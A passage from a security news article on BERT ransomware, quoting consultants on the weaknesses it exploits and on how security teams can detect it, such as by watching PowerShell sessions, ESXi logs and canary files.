“BERT exploits weak passwords, poor endpoint protection, excessive admin access, lack of monitoring, and insecure backups. It disables defenses, moves quickly, and can even target virtual machines, making recovery harder,” said Pareekh Jain, CEO at EIIRTrend & Pareekh Consulting. BERT ransomware is dangerous despite its simplicity because it’s fast, disables security tools and firewalls, and is easy for attackers to use. Its creators constantly improve it, making it harder to detect and stop, he added.
For CSOs, these tactics should serve as red flags. Even basic scripting and commodity tools can bypass enterprise defenses when combined with precision and configuration weaknesses.
“Security teams should closely monitor PowerShell sessions that attempt to download remote code or disable security tools, as well as any user account control bypass efforts. Activity around ESXi and vCenter logs, particularly bulk virtual machine shutdowns, should raise immediate red flags. Canary files, which can act as tripwires for early detection, are also critical,” said Amit Jaju, senior managing director at Ankura Consulting.
